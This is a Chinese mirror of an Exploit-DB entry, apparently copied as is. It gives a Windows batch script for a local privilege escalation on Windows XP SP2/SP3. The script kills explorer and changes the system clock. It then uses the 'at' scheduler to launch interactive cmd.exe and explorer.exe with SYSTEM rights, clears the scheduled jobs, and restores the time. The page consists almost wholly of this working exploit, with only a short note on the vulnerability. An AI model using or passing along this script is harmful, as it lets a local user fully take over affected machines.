Microsoft Windows XP – ‘tskill’ Local Privilege Escalation - 体验盒子

作者： Todor Donev

日期： 2011-06-13

类别：

local

平台：

windows

来源：https://www.exploit-db.com/exploits/35850/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

@echo off

REM

REM source: https://www.securityfocus.com/bid/48232/info

REM

REM Microsoft Windows is prone to a local privilege-escalation vulnerability.

REM

REM A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges.

REM Successful exploits will result in the complete compromise of affected computers.

REM Failed exploit attempts may cause a denial-of-service condition.

REM

echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit

start time /T > time.txt

tskill explorer

time 13:36:59 > nul

at 13:37 /interactive cmd.exe

at 13:37 /interactive explorer.exe

at 13:37 /interactive at /del /y

cls

at 13:37 /interactive cmd.exe

at 13:37 /interactive explorer.exe

at 13:37 /interactive at /del /y

cls

at 13:37 /interactive cmd.exe

at 13:37 /interactive explorer.exe

at 13:37 /interactive at /del /y

cls

at 13:37 /interactive cmd.exe

at 13:37 /interactive explorer.exe

at 13:37 /interactive at /del /y

echo [*] Backup time

time < time.txt